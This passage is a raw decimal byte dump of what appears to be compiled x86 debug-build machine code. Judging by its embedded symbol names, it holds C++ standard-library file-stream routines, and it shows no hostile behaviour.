04,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,252,0,0,0,83,86,87,81,141,189,4,255,255,255,185,63,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,248,255,21,184,52,2,16,59,244,232,53,235,255,255,133,192,15,132,185,0,0,0,139,244,139,77,248,255,21,192,52,2,16,59,244,232,27,235,255,255,139,240,139,252,139,77,248,255,21,184,52,2,16,59,252,232,7,235,255,255,59,240,15,131,139,0,0,0,232,181,233,255,255,137,133,8,255,255,255,141,69,8,80,141,141,8,255,255,255,81,232,105,232,255,255,131,196,8,15,182,208,133,210,117,62,139,244,139,77,248,255,21,184,52,2,16,59,244,232,200,234,255,255,131,232,1,80,232,55,235,255,255,131,196,4,137,133,20,255,255,255,141,69,8,80,141,141,20,255,255,255,81,232,43,232,255,255,131,196,8,15,182,208,133,210,116,40,139,244,139,77,248,255,21,196,52,2,16,59,244,232,138,234,255,255,141,69,8,80,232,161,232,255,255,131,196,4,233,195,0,0,0,233,190,0,0,0,139,69,248,131,120,84,0,116,37,232,33,233,255,255,137,133,32,255,255,255,141,69,8,80,141,141,32,255,255,255,81,232,213,231,255,255,131,196,8,15,182,208,133,210,116,15,232,252,232,255,255,233,134,0,0,0,233,129,0,0,0,139,69,248,131,120,68,0,117,54,141,69,8,80,232,128,233,255,255,131,196,4,136,133,47,255,255,255,139,77,248,139,81,84,82,141,133,47,255,255,255,80,232,185,233,255,255,131,196,8,15,182,200,133,201,116,7,139,69,8,235,68,235,66,139,244,139,77,248,255,21,184,52,2,16,59,244,232,230,233,255,255,139,77,248,131,193,72,59,193,116,33,141,69,8,80,232,46,233,255,255,131,196,4,139,77,248,136,65,72,139,77,248,232,10,232,255,255,139,69,8,235,7,235,5,232,113,232,255,255,95,94,91,129,196,252,0,0,0,59,236,232,166,233,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,228,0,0,0,83,86,87,81,141,189,28,255,255,255,185,57,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,248,255,21,184,52,2,16,59,244,232,245,232,255,255,133,192,116,73,139,244,139,77,248,255,21,184,52,2,16,59,244,232,223,232,255,255,139,240,139,252,139,77,248,255,21,180,52,2,16,59,252,232,203,232,255,255,59,240,115,31,139,244,139,77,248,255,21,184,52,2,16,59,244,232,181,232,255,255,80,232,39,233,255,255,131,196,4,235,100,235,98,139,69,248,139,16,139,244,139,77,248,139,66,28,255,208,59,244,232,146,232,255,255,137,69,236,232,69,231,255,255,137,133,32,255,255,255,141,77,236,81,141,149,32,255,255,255,82,232,249,229,255,255,131,196,8,15,182,192,133,192,116,7,139,69,236,235,31,235,29,139,244,139,69,236,80,139,77,248,139,17,139,77,248,139,66,16,255,208,59,244,232,73,232,255,255,139,69,236,82,139,205,80,141,21,252,43,1,16,232,173,229,255,255,88,90,95,94,91,129,196,228,0,0,0,59,236,232,37,232,255,255,139,229,93,195,141,73,0,1,0,0,0,4,44,1,16,236,255,255,255,4,0,0,0,16,44,1,16,95,77,101,116,97,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,239,180,1,16,100,161,0,0,0,0,80,129,236,244,1,0,0,83,86,87,81,141,189,0,254,255,255,185,125,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,137,69,240,80,141,69,244,100,163,0,0,0,0,137,77,232,139,244,139,77,232,255,21,184,52,2,16,59,244,232,99,231,255,255,133,192,116,76,139,244,139,77,232,255,21,184,52,2,16,59,244,232,77,231,255,255,139,240,139,252,139,77,232,255,21,180,52,2,16,59,252,232,57,231,255,255,59,240,115,34,139,244,139,77,232,255,21,172,52,2,16,59,244,232,35,231,255,255,80,232,149,231,255,255,131,196,4,233,179,3,0,0,235,19,139,69,232,131,120,84,0,117,10,232,192,229,255,255,233,158,3,0,0,139,77,232,232,146,227,255,255,139,69,232,131,120,68,0,117,77,198,69,223,0,139,69,232,139,72,84,81,141,85,223,82,232,93,231,255,255,131,196,8,15,182,192,133,192,116,20,141,77,223,81,232,64,231,255,255,131,196,4,137,133,16,254,255,255,235,11,232,115,229,255,255,137,133,16,254,255,255,139,133,16,254,255,255,233,69,3,0,0,233,64,3,0,0,141,77,180,232,32,227,255,255,199,69,252,0,0,0,0,139,244,139,69,232,139,72,84,81,255,21,8,54,2,16,131,196,4,59,244,232,122,230,255,255,137,133,120,255,255,255,131,189,120,255,255,255,255,117,37,232,33,229,255,255,137,133,24,254,255,255,199,69,252,255,255,255,255,141,77,180,232,36,230,255,255,139,133,24,254,255,255,233,228,2,0,0,15,182,133,120,255,255,255,80,106,1,141,77,180,232,26,231,255,255,139,244,141,69,156,80,141,77,172,81,141,85,171,82,141,69,144,80,141,141,48,254,255,255,81,141,77,180,232,33,226,255,255,137,133,16,254,255,255,139,149,16,254,255,255,137,149,12,254,255,255,198,69,252,1,139,141,12,254,255,255,232,232,229,255,255,139,248,141,77,180,232,61,230,255,255,3,248,87,141,133,68,254,255,255,80,141,77,180,232,228,225,255,255,137,133,8,254,255,255,139,141,8,254,255,255,137,141,4,254,255,255,198,69,252,2,139,141,4,254,255,255,232,171,229,255,255,80,139,85,232,131,194,76,82,139,69,232,139,72,68,255,21,176,52,2,16,59,244,232,154,229,255,255,137,133,36,254,255,255,198,69,252,1,141,141,68,254,255,255,232,75,227,255,255,198,69,252,0,141,141,48,254,255,255,232,60,227,255,255,139,141,36,254,255,255,137,141,0,254,255,255,131,189,0,254,255,255,0,15,140,197,1,0,0,131,189,0,254,255,255,1,126,18,131,189,0,254,255,255,3,15,132,26,1,0,0,233,170,1,0,0,139,69,156,141,77,171,59,193,15,132,179,0,0,0,141,133,88,254,255,255,80,141,77,180,232,51,225,255,255,137,133,16,254,255,255,139,141,16,254,255,255,137,141,12,254,255,255,198,69,252,3,139,141,12,254,255,255,232,250,228,255,255,139,240,141,77,180,232,79,229,255,255,3,240,43,117,144,137,117,132,198,69,252,0,141,141,88,254,255,255,232,169,226,255,255,131,125,132,0,126,46,139,69,132,131,232,1,137,69,132,139,244,139,77,232,139,81,84,82,139,69,144,3,69,132,15,190,8,81,255,21,12,54,2,16,131,196,8,59,244,232,177,228,255,255,235,204,141,69,171,80,232,30,229,255,255,131,196,4,137,133,108,254,255,255,199,69,252,255,255,255,255,141,77,180,232,97,228,255,255,139,133,108,254,255,255,233,33,1,0,0,235,79,141,133,120,254,255,255,80,141,77,180,232,128,224,255,255,137,133,16,254,255,255,139,141,16,254,255,255,137,141,12,254,255,255,198,69,252,4,139,141,12,254,255,255,232,71,228,255,255,139,85,144,43,208,82,106,0,141,77,180,232,87,226,255,255,198,69,252,0,141,141,120,254,255,255,232,248,225,255,255,233,183,0,0,0,141,77,180,232,122,228,255,255,131,248,1,115,5,233,165,0,0,0,139,244,106,1,141,133,140,254,255,255,80,141,77,180,232,22,224,255,255,137,133,16,254,255,255,139,141,16,254,255,255,137,141,12,254,255,255,198,69,252,5,139,141,12,254,255,255,232,221,227,255,255,80,106,1,141,85,171,82,255,21,16,54,2,16,131,196,16,59,244,232,208,227,255,255,198,69,252,0,141,141,140,254,255,255,232,135,225,255,255,141,69,171,80,232,48,228,255,255,131,196,4,137,133,160,254,255,255,199,69,252,255,255,255,255,141,77,180,232,115,227,255,255,139,133,160,254,255,255,235,54,232,78,226,255,255,137,133,172,254,255,255,199,69,252,255,255,255,255,141,77,180,232,81,227,255,255,139,133,172,254,255,255,235,20,233,222,252,255,255,199,69,252,255,255,255,255,141,77,180,232,53,227,255,255,82,139,205,80,141,21,244,48,1,16,232,201,224,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,139,77,240,51,205,232,141,223,255,255,129,196,0,2,0,0,59,236,232,44,227,255,255,139,229,93,195,139,255,5,0,0,0,252,48,1,16,223,255,255,255,1,0,0,0,76,49,1,16,180,255,255,255,32,0,0,0,71,49,1,16,171,255,255,255,1,0,0,0,67,49,1,16,156,255,255,255,4,0,0,0,61,49,1,16,144,255,255,255,4,0,0,0,56,49,1,16,95,83,114,99,0,95,68,101,115,116,0,95,67,104,0,95,83,116,114,0,95,67,104,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,220,0,0,0,83,86,87,81,141,189,36,255,255,255,185,55,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,248,255,21,184,52,2,16,59,244,232,85,225,255,255,139,77,248,131,193,72,59,193,117,33,131,125,20,1,117,27,139,69,248,131,120,68,0,117,18,139,69,12,131,232,1,139,77,16,131,217,0,137,69,12,137,77,16,139,69,248,131,120,84,0,116,103,139,77,248,232,31,224,255,255,15,182,192,133,192,116,88,139,69,12,11,69,16,117,6,131,125,20,1,116,41,139,244,139,69,20,80,139,77,16,81,139,85,12,82,139,69,248,139,72,84,81,255,21,0,54,2,16,131,196,16,59,244,232,223,224,255,255,133,192,117,33,139,244,141,69,232,80,139,77,248,139,81,84,82,255,21,4,54,2,16,131,196,8,59,244,232,190,224,255,255,133,192,116,25,161,168,52,2,16,139,72,4,81,139,16,82,139,77,8,232,227,223,255,255,139,69,8,235,34,139,77,248,232,51,221,255,255,139,69,236,80,139,77,232,81,139,85,248,139,66,76,80,139,77,8,232,220,224,255,255,139,69,8,82,139,205,80,141,21,196,51,1,16,232,230,221,255,255,88,90,95,94,91,129,196,220,0,0,0,59,236,232,94,224,255,255,139,229,93,194,20,0,139,255,1,0,0,0,204,51,1,16,232,255,255,255,8,0,0,0,216,51,1,16,95,70,105,108,101,112,111,115,105,116,105,111,110,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,236,0,0,0,83,86,87,81,141,189,20,255,255,255,185,59,0,0,0,184,204,204,204,204,243,171,89,137,77,248,141,77,12,232,54,224,255,255,137,69,232,137,85,236,141,77,12,232,126,223,255,255,139,200,139,242,139,69,232,153,43,200,27,242,137,77,216,137,117,220,139,69,248,131,120,84,0,15,132,128,0,0,0,139,77,248,232,128,222,255,255,15,182,192,133,192,116,113,139,244,141,69,232,80,139,77,248,139,81,84,82,255,21,252,53,2,16,131,196,8,59,244,232,86,223,255,255,133,192,117,80,139,69,216,11,69,220,116,39,139,244,106,1,139,69,220,80,139,77,216,81,139,85,248,139,66,84,80,255,21,0,54,2,16,131,196,16,59,244,232,39,223,255,255,133,192,117,33,139,244,141,69,232,80,139,77,248,139,81,84,82,255,21,4,54,2,16,131,196,8,59,244,232,6,223,255,255,133,192,116,25,161,168,52,2,16,139,72,4,81,139,16,82,139,77,8,232,43,222,255,255,139,69,8,235,48,141,77,12,232,248,219,255,255,139,77,248,137,65,76,139,77,248,232,109,219,255,255,139,69,236,80,139,77,232,81,139,85,248,139,66,76,80,139,77,8,232,22,223,255,255,139,69,8,82,139,205,80,141,21,136,53,1,16,232,32,220,255,255,88,90,95,94,91,129,196,236,0,0,0,59,236,232,152,222,255,255,139,229,93,194,32,0,1,0,0,0,144,53,1,16,232,255,255,255,8,0,0,0,156,53,1,16,95,70,105,108,101,112,111,115,105,116,105,111,110,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,120,84,0,116,80,131,125,8,0,117,20,139,69,12,11,69,16,117,12,199,133,48,255,255,255,4,0,0,0,235,10,199,133,48,255,255,255,0,0,0,0,139,77,12,139,244,81,139,149,48,255,255,255,82,139,69,8,80,139,77,248,139,81,84,82,255,21,248,53,2,16,131,196,16,59,244,232,146,221,255,255,133,192,116,6,51,192,235,22,235,20,106,1,139,69,248,139,72,84,81,139,77,248,232,185,220,255,255,139,69,248,95,94,91,129,196,208,0,0,0,59,236,232,100,221,255,255,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,232,0,0,0,83,86,87,81,141,189,24,255,255,255,185,58,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,120,84,0,116,115,232,180,219,255,255,139,244,80,139,77,248,139,17,139,77,248,139,66,12,255,208,59,244,232,226,220,255,255,137,133,32,255,255,255,232,146,219,255,255,137,133,44,255,255,255,141,141,32,255,255,255,81,141,149,44,255,255,255,82,232,67,218,255,255,131,196,8,15,182,192,133,192,117,41,139,244,139,77,248,139,81,84,82,255,21,40,54,2,16,131,196,4,59,244,232,155,220,255,255,133,192,125,12,199,133,24,255,255,255,255,255,255,255,235,10,199,133,24,255,255,255,0,0,0,0,139,133,24,255,255,255,95,94,91,129,196,232,0,0,0,59,236,232,107,220,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,8,80,232,42,216,255,255,131,196,4,80,139,77,248,232,171,220,255,255,95,94,91,129,196,204,0,0,0,59,236,232,226,219,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,131,233,96,232,183,216,255,255,139,69,8,131,224,1,116,15,139,69,248,131,232,96,80,232,248,216,255,255,131,196,4,139,69,248,131,232,96,95,94,91,129,196,204,0,0,0,59,236,232,95,219,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,39,215,255,255,139,69,8,131,224,1,116,12,139,69,248,80,232,126,216,255,255,131,196,4,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,232,218,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,17,220,255,255,95,94,91,129,196,204,0,0,0,59,236,232,143,218,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,73,219,255,255,95,94,91,129,196,204,0,0,0,59,236,232,63,218,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,178,219,255,255,95,94,91,129,196,204,0,0,0,59,236,232,239,217,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,199,133,44,255,255,255,0,0,0,0,139,69,248,80,139,77,248,232,158,215,255,255,80,139,77,8,232,166,218,255,255,139,141,44,255,255,255,131,201,1,137,141,44,255,255,255,139,69,8,95,94,91,129,196,216,0,0,0,59,236,232,118,217,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,199,0,0,0,0,0,199,64,4,0,0,0,0,139,69,248,139,77,12,137,72,8,139,85,16,137,80,12,139,69,248,139,77,8,137,72,16,139,69,248,95,94,91,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,64,16,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,139,65,8,139,81,12,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,64,8,153,139,77,248,3,1,19,81,4,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,66,181,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,244,139,77,236,255,21,164,52,2,16,59,244,232,182,215,255,255,199,69,252,0,0,0,0,139,69,236,199,0,220,246,1,16,106,0,139,69,8,80,139,77,236,232,218,214,255,255,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,115,215,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,123,181,1,16,100,161,0,0,0,0,80,129,236,236,0,0,0,83,86,87,81,141,189,8,255,255,255,185,59,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,69,236,131,120,84,0,117,39,139,244,139,69,16,80,139,77,12,81,139,85,8,82,255,21,156,52,2,16,131,196,12,59,244,232,209,214,255,255,137,69,224,131,125,224,0,117,4,51,192,235,109,106,1,139,69,224,80,139,77,236,232,248,213,255,255,139,244,141,133,20,255,255,255,80,139,77,236,255,21,160,52,2,16,59,244,232,157,214,255,255,137,133,12,255,255,255,139,141,12,255,255,255,137,141,8,255,255,255,199,69,252,0,0,0,0,139,149,8,255,255,255,82,232,164,210,255,255,131,196,4,80,139,77,236,232,37,215,255,255,199,69,252,255,255,255,255,141,141,20,255,255,255,232,169,210,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,248,0,0,0,59,236,232,60,214,255,255,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,137,69,236,139,69,248,131,120,84,0,117,9,199,69,236,0,0,0,0,235,58,139,77,248,232,173,212,255,255,15,182,192,133,192,117,7,199,69,236,0,0,0,0,139,244,139,69,248,139,72,84,81,255,21,240,53,2,16,131,196,4,59,244,232,128,213,255,255,133,192,116,7,199,69,236,0,0,0,0,106,2,106,0,139,77,248,232,171,212,255,255,139,69,236,95,94,91,129,196,216,0,0,0,59,236,232,86,213,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,252,0,0,0,83,86,87,81,141,189,4,255,255,255,185,63,0,0,0,184,204,204,204,204,243,171,89,137,77,248,51,192,131,125,12,1,15,148,192,139,77,248,136,65,80,139,69,248,198,64,73,0,139,244,139,77,248,255,21,148,52,2,16,59,244,232,223,212,255,255,131,125,8,0,116,84,184,1,0,0,0,133,192,116,75,139,69,8,131,192,8,137,69,236,139,69,8,137,69,224,139,69,8,131,192,4,137,69,212,139,69,8,131,192,4,137,69,200,139,244,139,69,200,80,139,77,224,81,139,85,236,82,139,69,212,80,139,77,224,81,139,85,236,82,139,77,248,255,21,152,52,2,16,59,244,232,133,212,255,255,139,69,248,139,77,8,137,72,84,139,69,248,139,13,96,35,2,16,137,72,76,139,69,248,199,64,68,0,0,0,0,95,94,91,129,196,252,0,0,0,59,236,232,86,212,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,251,181,1,16,100,161,0,0,0,0,80,129,236,236,1,0,0,83,86,87,81,141,189,8,254,255,255,185,123,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,137,69,240,80,141,69,244,100,163,0,0,0,0,137,77,232,199,133,208,254,255,255,0,0,0,0,139,69,232,131,120,68,0,116,11,139,69,232,15,182,72,73,133,201,117,12,176,1,233,9,3,0,0,233,4,3,0,0,199,69,220,8,0,0,0,232,90,210,255,255,139,244,80,139,69,232,139,16,139,77,232,139,66,12,255,208,59,244,232,136,211,255,255,137,133,32,254,255,255,232,56,210,255,255,137,133,44,254,255,255,141,141,32,254,255,255,81,141,149,44,254,255,255,82,232,233,208,255,255,131,196,8,15,182,192,133,192,116,7,50,192,233,172,2,0,0,106,0,106,8,141,77,168,232,176,211,255,255,199,69,252,0,0,0,0,139,244,141,69,208,80,141,141,68,254,255,255,81,141,77,168,232,57,207,255,255,137,133,24,254,255,255,139,149,24,254,255,255,137,149,20,254,255,255,198,69,252,1,139,141,20,254,255,255,232,0,211,255,255,139,248,141,77,168,232,85,211,255,255,3,248,87,141,133,88,254,255,255,80,141,77,168,232,252,206,255,255,137,133,16,254,255,255,139,141,16,254,255,255,137,141,12,254,255,255,198,69,252,2,139,141,12,254,255,255,232,195,210,255,255,80,139,85,232,131,194,76,82,139,69,232,139,72,68,255,21,144,52,2,16,59,244,232,178,210,255,255,137,133,56,254,255,255,198,69,252,1,141,141,88,254,255,255,232,99,208,255,255,198,69,252,0,141,141,68,254,255,255,232,84,208,255,255,139,141,56,254,255,255,137,141,8,254,255,255,131,189,8,254,255,255,0,116,27,131,189,8,254,255,255,1,116,25,131,189,8,254,255,255,3,15,132,108,1,0,0,233,133,1,0,0,139,69,232,198,64,73,0,141,133,108,254,255,255,80,141,77,168,232,86,206,255,255,137,133,24,254,255,255,139,141,24,254,255,255,137,141,20,254,255,255,198,69,252,3,139,141,20,254,255,255,232,29,210,255,255,139,85,208,43,208,137,85,156,198,69,252,0,141,141,108,254,255,255,232,214,207,255,255,131,125,156,0,118,112,139,244,139,69,232,139,72,84,81,139,85,156,82,106,1,141,133,140,254,255,255,80,141,77,168,232,250,205,255,255,137,133,24,254,255,255,139,141,24,254,255,255,137,141,20,254,255,255,198,69,252,4,139,149,208,254,255,255,131,202,1,137,149,208,254,255,255,139,141,20,254,255,255,232,178,209,255,255,80,255,21,20,54,2,16,131,196,16,59,244,232,171,209,255,255,57,69,156,116,12,199,133,16,254,255,255,1,0,0,0,235,10,199,133,16,254,255,255,0,0,0,0,138,133,16,254,255,255,136,133,131,254,255,255,199,69,252,0,0,0,0,139,141,208,254,255,255,131,225,1,116,18,131,165,208,254,255,255,254,141,141,140,254,255,255,232,38,207,255,255,15,182,149,131,254,255,255,133,210,116,33,198,133,163,254,255,255,0,199,69,252,255,255,255,255,141,77,168,232,18,209,255,255,138,133,163,254,255,255,233,141,0,0,0,139,69,232,15,182,72,73,133,201,117,30,198,133,175,254,255,255,1,199,69,252,255,255,255,255,141,77,168,232,230,208,255,255,138,133,175,254,255,255,235,100,131,125,156,0,117,12,106,0,106,8,141,77,168,232,223,209,255,255,235,60,198,133,187,254,255,255,1,199,69,252,255,255,255,255,141,77,168,232,180,208,255,255,138,133,187,254,255,255,235,50,198,133,199,254,255,255,0,199,69,252,255,255,255,255,141,77,168,232,150,208,255,255,138,133,199,254,255,255,235,20,233,118,253,255,255,199,69,252,255,255,255,255,141,77,168,232,122,208,255,255,82,139,205,80,141,21,176,67,1,16,232,14,206,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,139,77,240,51,205,232,210,204,255,255,129,196,248,1,0,0,59,236,232,113,208,255,255,139,229,93,195,141,73,0,2,0,0,0,184,67,1,16,208,255,255,255,4,0,0,0,213,67,1,16,168,255,255,255,32,0,0,0,208,67,1,16,95,83,116,114,0,95,68,101,115,116,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,8,255,21,140,52,2,16,59,244,232,5,207,255,255,15,182,192,133,192,116,12,139,69,248,199,64,68,0,0,0,0,235,27,139,